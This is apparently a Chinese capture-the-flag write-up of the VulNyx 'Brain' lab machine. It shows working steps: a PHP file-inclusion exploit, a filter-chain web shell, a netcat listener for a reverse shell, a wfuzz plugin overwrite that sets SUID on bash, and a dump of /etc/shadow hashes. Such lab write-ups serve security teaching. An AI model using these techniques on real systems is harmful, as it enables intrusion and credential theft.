Vlx_Brain

靶机来源： https://vulnyx.com/

难度：Easy

思维导图：

一、信息收集

1、主机探测

┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-01 16:14 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00100s latency).
MAC Address: 0A:00:27:00:00:06 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00066s latency).
MAC Address: 08:00:27:2E:84:EB (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.13
Host is up (0.00057s latency).
MAC Address: 08:00:27:26:F4:71 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.58 seconds

靶机IP：192.168.2.13

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -p- 192.168.2.13                   
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-01 16:14 +0800
Nmap scan report for 192.168.2.13
Host is up (0.00017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:26:F4:71 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.61 seconds

开放端口：22、80

2.详细信息扫描

┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80 192.168.2.13
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-01 16:14 +0800
Nmap scan report for 192.168.2.13
Host is up (0.0011s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 32:95:f9:20:44:d7:a1:d1:80:a8:d6:95:91:d5:1e:da (RSA)
|   256 07:e7:24:38:1d:64:f6:88:9a:71:23:79:b8:d8:e6:57 (ECDSA)
|_  256 58:a6:da:1e:0f:89:42:2b:ba:de:00:fc:71:78:3d:56 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:26:F4:71 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.24 seconds

3.udp扫描

┌──(root㉿kali)-[~]
└─# nmap -sU --top-ports 100 192.168.2.13                    
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-01 16:15 +0800
Nmap scan report for 192.168.2.13
Host is up (0.0014s latency).
All 100 scanned ports on 192.168.2.13 are in ignored states.
Not shown: 57 closed udp ports (port-unreach), 43 open|filtered udp ports (no-response)
MAC Address: 08:00:27:26:F4:71 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 57.06 seconds

二、WEB渗透

1、80端口

访问80端口，是一个进程任务的列表

2、目录扫描

┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.2.13 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,bak

index.php            (Status: 200) [Size: 361]

只找到index.php

3、FUZZ

尝试进行模糊测试

┌──(root㉿kali)-[~/miaosec]
└─# ffuf -u http://192.168.2.13/index.php?FUZZ=/etc/passwd -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -fs 20 -ac

include                 [Status: 200, Size: 1750, Words: 125, Lines: 34, Duration: 1ms]

找到一个参数include

进行读取/etc/passwd

┌──(root㉿kali)-[~]
└─# curl http://192.168.2.13/index.php?include=/etc/passwd                                                                  
<pre>
runnable tasks:
 S           task   PID         tree-key  switches  prio     wait-time             sum-exec        sum-sleep
-----------------------------------------------------------------------------------------------------------
 S        systemd     1      2927.102286      1731   120         0.000000       509.025216         0.000000 0 0 /
</pre>

root:x:0:0:root:/root:/bin/bash
...
ben:x:1000:1000:ben,,,:/home/ben:/bin/bash

找到另外一个用户ben

三、获取shell

方法一、/proc/sched_debug

/proc/sched_debug 是 Linux 内核提供的一个虚拟调试文件，位于 /proc 伪文件系统中。它用于输出内核调度器（主要是 CFS，即 Completely Fair Scheduler）的详细运行状态和调试信息，是系统性能分析、调度问题排查和内核调试的重要工具。 可以列出所有的进程任务

在进程任务中，能成功获取到ben用户的登录凭证

直接进行登录即可

┌──(root㉿kali)-[~/Tool]
└─# ssh ben@192.168.2.13       

ben@brain:~$ id
uid=1000(ben) gid=1000(ben) groups=1000(ben)

方法二、PHP伪协议

尝试使用PHP伪协议去读取index.php源码

┌──(root㉿kali)-[~]
└─# curl http://192.168.2.13/index.php?include=php://filter/read=convert.base64-encode/resource=index.php
<pre>
runnable tasks:
 S           task   PID         tree-key  switches  prio     wait-time             sum-exec        sum-sleep
-----------------------------------------------------------------------------------------------------------
 S        systemd     1      2927.102286      1731   120         0.000000       509.025216         0.000000 0 0 /
</pre>

PHByZT4KcnVubmFibGUgdGFza3M6CiBTICAgICAgICAgICB0YXNrICAgUElEICAgICAgICAgdHJlZS1rZXkgIHN3aXRjaGVzICBwcmlvICAgICB3YWl0LXRpbWUgICAgICAgICAgICAgc3VtLWV4ZWMgICAgICAgIHN1bS1zbGVlcAotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQogUyAgICAgICAgc3lzdGVtZCAgICAgMSAgICAgIDI5MjcuMTAyMjg2ICAgICAgMTczMSAgIDEyMCAgICAgICAgIDAuMDAwMDAwICAgICAgIDUwOS4wMjUyMTYgICAgICAgICAwLjAwMDAwMCAwIDAgLwo8L3ByZT4KCjw/cGhwCiAgICAkZmlsZW5hbWUgPSAkX0dFVFsnaW5jbHVkZSddOwogICAgaW5jbHVkZSgkZmlsZW5hbWUpOwo/Pgo= 

进行解密

┌──(root㉿kali)-[~]
└─# echo PHByZT4KcnVubmFibGUgdGFza3M6CiBTICAgICAgICAgICB0YXNrICAgUElEICAgICAgICAgdHJlZS1rZXkgIHN3aXRjaGVzICBwcmlvICAgICB3YWl0LXRpbWUgICAgICAgICAgICAgc3VtLWV4ZWMgICAgICAgIHN1bS1zbGVlcAotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQogUyAgICAgICAgc3lzdGVtZCAgICAgMSAgICAgIDI5MjcuMTAyMjg2ICAgICAgMTczMSAgIDEyMCAgICAgICAgIDAuMDAwMDAwICAgICAgIDUwOS4wMjUyMTYgICAgICAgICAwLjAwMDAwMCAwIDAgLwo8L3ByZT4KCjw/cGhwCiAgICAkZmlsZW5hbWUgPSAkX0dFVFsnaW5jbHVkZSddOwogICAgaW5jbHVkZSgkZmlsZW5hbWUpOwo/Pgo= | base64 -d
<pre>
runnable tasks:
 S           task   PID         tree-key  switches  prio     wait-time             sum-exec        sum-sleep
-----------------------------------------------------------------------------------------------------------
 S        systemd     1      2927.102286      1731   120         0.000000       509.025216         0.000000 0 0 /
</pre>

<?php
    $filename = $_GET['include'];
    include($filename);
?>

使用FilterChain进行获取shell 工具：GitHub - synacktiv/php_filter_chain_generator · GitHub

1. 构造代码

┌──(root㉿kali)-[~/Tool]
└─# python3 php_filter_chain_generator.py --chain "<?php system(\$_GET['a']);?>"
[+] The following gadget chain will generate the following code : <?php system($_GET['a']);?> (base64 value: PD9waHAgc3lzdGVtKCRfR0VUWydhJ10pOz8+)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

1. 执行反弹shell的命令
2. 监听，成功获取到shell

┌──(root㉿kali)-[~/Tool]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.13] 49404
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

四、权限提升

1、获取ben权限

查看系统运行的进程，成功获取到用户ben的密码

ben:B3nP4zz

成功登录

┌──(root㉿kali)-[~/Tool]
└─# ssh ben@192.168.2.13       

ben@brain:~$ id
uid=1000(ben) gid=1000(ben) groups=1000(ben)

2、获取root权限

查看sudo -l

ben@brain:~$ sudo -l
Matching Defaults entries for ben on Brain:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ben may run the following commands on Brain:
    (root) NOPASSWD: /usr/bin/wfuzz

同时查看可以写入的文件

ben@brain:~$ find / \( -path /proc -o -path /sys \) -prune -o -perm -o=w -type f -print 2>/dev/null
/usr/lib/python3/dist-packages/wfuzz/plugins/payloads/range.py

ben@brain:~$ ls -ld /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/range.py
-rwxrwxrwx 1 root root 1519 Apr 19  2023 /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/range.py

发现wfuzz所使用的函数range.py可写 覆盖range.py

ben@brain:~$ echo -e 'import os\nos.system("chmod 4755 /bin/bash")' >> /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/range.py

使用-z参数加载range模板

ben@brain:~$ sudo wfuzz -c -z range 1-2

ben@brain:~$ ls -la /bin/bash
-rwsr-xr-x 1 root root 1168776 Apr 18  2019 /bin/bash

成功获取到root权限

ben@brain:~$ /bin/bash -p
bash-5.0# id
uid=1000(ben) gid=1000(ben) euid=0(root) groups=1000(ben)

五、查看FLAG

bash-5.0# cat /root/root.txt /home/ben/user.txt 
08cxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
4bexxxxxxxxxxxxxxxxxxxxxxxxxxxxx

也可以使用参数-w读取文件作为字典

ben@brain:~$ sudo /usr/bin/wfuzz -w /etc/shadow -u http://192.168.2.4/FUZZ

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.2.4/FUZZ
Total requests: 26

==================================================================
ID   Response   Lines      Word         Chars          Payload    
==================================================================

000002:  C=404     13 L       32 W          335 Ch        "daemon:*:18651:0:99999:7:::"
000003:  C=404     13 L       32 W          335 Ch        "bin:*:18651:0:99999:7:::"
000001:  C=404     13 L       32 W          335 Ch        "root:$6$dYmzBegce95vTVtb$sE8QJJjcUj3Pr7OHs.ynQZhHQGFaH2tvvbIOpVYAfFcsfRjjap1Xn4r03qY0VXRpCcZcU.9YNNAC3yuP8kf0.1:19466:0:99999:7:::"
000006:  C=404     13 L       32 W          335 Ch        "games:*:18651:0:99999:7:::"
000008:  C=404     13 L       32 W          335 Ch        "lp:*:18651:0:99999:7:::"
000004:  C=404     13 L       32 W          335 Ch        "sys:*:18651:0:99999:7:::"
000005:  C=404     13 L       32 W          335 Ch        "sync:*:18651:0:99999:7:::"
000007:  C=404     13 L       32 W          335 Ch        "man:*:18651:0:99999:7:::"
000013:  C=404     13 L       32 W          335 Ch        "www-data:*:18651:0:99999:7:::"
000011:  C=404     13 L       32 W          335 Ch        "uucp:*:18651:0:99999:7:::"
000012:  C=404     13 L       32 W          335 Ch        "proxy:*:18651:0:99999:7:::"
000014:  C=404     13 L       32 W          335 Ch        "backup:*:18651:0:99999:7:::"
000016:  C=404     13 L       32 W          335 Ch        "irc:*:18651:0:99999:7:::"
000015:  C=404     13 L       32 W          335 Ch        "list:*:18651:0:99999:7:::"
000019:  C=404     13 L       32 W          335 Ch        "_apt:*:18651:0:99999:7:::"
000017:  C=404     13 L       32 W          335 Ch        "gnats:*:18651:0:99999:7:::"
000018:  C=404     13 L       32 W          335 Ch        "nobody:*:18651:0:99999:7:::"
000020:  C=404     13 L       32 W          335 Ch        "systemd-timesync:*:18651:0:99999:7:::"
000021:  C=404     13 L       32 W          335 Ch        "systemd-network:*:18651:0:99999:7:::"
000023:  C=404     13 L       32 W          335 Ch        "messagebus:*:18651:0:99999:7:::"
000025:  C=404     13 L       32 W          335 Ch        "systemd-coredump:!!:18651::::::"
000024:  C=404     13 L       32 W          335 Ch        "sshd:*:18651:0:99999:7:::"
000026:  C=404     13 L       32 W          335 Ch        "ben:$6$UHPEI8/0TIe9ujN6$tAiJp2x3QN0DH3MSCMYgyAUA241o2CWJ47agef1GfAMatBw5i3.MMocpoq7kvBnPNtQupCrvIRQtfnV5OFkcD0:19466:0:99999:7:::"
000022:  C=404     13 L       32 W          335 Ch        "systemd-resolve:*:18651:0:99999:7:::"
000010:  C=404     13 L       32 W          335 Ch        "news:*:18651:0:99999:7:::"
000009:  C=404     13 L       32 W          335 Ch        "mail:*:18651:0:99999:7:::"

Total time: 1.063881
Processed Requests: 26
Filtered Requests: 0
Requests/sec.: 24.43881

成功获取到两条信息

root:$6$dYmzBegce95vTVtb$sE8QJJjcUj3Pr7OHs.ynQZhHQGFaH2tvvbIOpVYAfFcsfRjjap1Xn4r03qY0VXRpCcZcU.9YNNAC3yuP8kf0.1:19466:0:99999:7:::
ben:$6$UHPEI8/0TIe9ujN6$tAiJp2x3QN0DH3MSCMYgyAUA241o2CWJ47agef1GfAMatBw5i3.MMocpoq7kvBnPNtQupCrvIRQtfnV5OFkcD0:19466:0:99999:7:::

但是无法爆出密码